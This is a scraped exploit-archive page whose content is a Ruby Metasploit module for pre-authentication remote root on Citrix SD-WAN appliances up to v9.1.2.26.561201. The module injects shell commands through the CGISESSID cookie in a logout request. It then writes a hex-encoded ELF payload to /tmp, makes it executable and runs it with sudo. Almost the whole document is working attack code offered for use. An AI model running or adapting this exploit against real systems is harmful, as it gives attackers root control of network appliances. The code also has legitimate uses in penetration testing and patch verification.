扫码分享
验证:
体验盒子|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 |
# Exploit Title: Citix SD-WAN logout cookie preauth Remote Command Injection Vulnerablity # Date: 02/20/2017 # Exploit Author: xort @ Critical Start # Vendor Homepage: www.citrix.com # Software Link: https://www.citrix.com/downloads/cloudbridge/ # Version: 9.1.2.26.561201 # Tested on: 9.1.2.26.561201 (OS partition 4.6) # # CVE : (awaiting cve) # vuln: CGISESSID Cookie parameter #associated vuln urls: # /global_data/ # /global_data/headerdata # /log # / # /r9-1-2-26-561201/configuration/ # /r9-1-2-26-561201/configuration/edit # /r9-1-2-26-561201/configuration/www.citrix.com [CGISESSID cookie] # # Description PreAuth Remote Root Citrix SD-WAN <= v9.1.2.26.561201. This exploit leverages a command injection bug. # # xort @ Critical Start require 'msf/core' class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking includeExploit::Remote::Tcp include Msf::Exploit::Remote::HttpClient def initialize(info = {}) super(update_info(info, 'Name' => 'Citrix SD-WAN CGISESSID Cookie Remote Root', 'Description'=> %q{ This module exploits a remote command execution vulnerability in the Citrix SD-WAN Appliace Version <=v9.1.2.26.561201. The vulnerability exist in a section of the machine's session checking functionality. If the CGISESSID cookie holds shell-command data - it is used in a call to system where input is processed unsanitized. }, 'Author' => [ 'xort@Critical Start', # vuln + metasploit module ], 'Version'=> '$Revision: 1 $', 'References' => [ [ 'none', 'none'], ], 'Platform'=> [ 'linux'], 'Privileged' => true, 'Arch'=> [ ARCH_X86 ], 'SessionTypes'=> [ 'shell' ], 'Payload'=> { 'Compat' => { 'ConnectionType' => 'find', } }, 'Targets'=> [ ['Linux Universal', { 'Arch' => ARCH_X86, 'Platform' => 'linux' } ], ], 'DefaultTarget' => 0)) register_options( [ OptString.new('CMD', [ false, 'Command to execute', "" ]), Opt::RPORT(443), ], self.class) end def run_command(cmd) vprint_status( "Running Command...\n" ) # send request with payload res = send_request_cgi({ 'method' => 'POST', 'uri' => "/global_data/", 'vars_post' => { 'action' => 'logout' }, 'headers' => { 'Connection' => 'close', 'Cookie' => 'CGISESSID=e6f1106605b5e8bee6114a3b5a88c5b4<code>'+cmd+'</code>; APNConfigEditorSession=0qnfarge1v62simtqeb300lkc7;', } }) # pause to let things run smoothly sleep(2) end def exploit # timeout timeout = 1550; # pause to let things run smoothly sleep(2) #if no 'CMD' string - add code for root shell if not datastore['CMD'].nil? and not datastore['CMD'].empty? cmd = datastore['CMD'] # Encode cmd payload encoded_cmd = cmd.unpack("H*").join().gsub(/(\w)(\w)/,'\\\\\\\\\\\\x\1\2') # upload elf to /tmp/n , chmod +rx /tmp/n , then run /tmp/n (payload) run_command("echo -e #{encoded_cmd}>/tmp/n") run_command("chmod 755 /tmp/n") run_command("sudo /tmp/n") else # Encode payload to ELF file for deployment elf = Msf::Util::EXE.to_linux_x86_elf(framework, payload.raw) encoded_elf = elf.unpack("H*").join().gsub(/(\w)(\w)/,'\\\\\\\\\\\\x\1\2') # upload elf to /tmp/m , chmod +rx /tmp/m , then run /tmp/m (payload) run_command("echo -e #{encoded_elf}>/tmp/m") run_command("chmod 755 /tmp/m") run_command("sudo /tmp/m") # wait for magic handler end end end |
体验盒子
